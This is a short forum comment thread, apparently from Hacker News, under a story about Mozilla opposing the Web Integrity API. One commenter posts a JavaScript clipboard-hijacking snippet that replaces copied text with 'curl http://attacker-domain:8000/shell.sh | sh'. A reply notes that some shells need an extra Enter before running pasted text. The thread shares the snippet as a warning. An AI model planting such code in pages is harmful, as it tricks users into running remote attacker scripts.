zlacker

[return to "Mozilla Standards Positions Opposes Web Integrity API"]
1. egbert+ZT[view] [source] 2023-07-25 10:54:59
>>danShu+(OP)
Number one reason why I do not turn JavaScript on, and I will definitely block WebInegrityAPI indefinitely.

Basic malware JavaScript snippet:

    <script>
    document.getElementById('copy').addEventListener('copy', function(e) {
        e.clipboardData.setData('text/plain', 
        'curl http://attacker-domain:8000/shell.sh | sh\n'); e.preventDefault();
     });
     </script>
◧◩
2. wester+YX[view] [source] 2023-07-25 11:29:00
>>egbert+ZT
This particular attack is actually not a concern if you're using fish (or zsh for that matter I think), as it will not execute pasted content without an additional pressing of the enter key.
[go to top]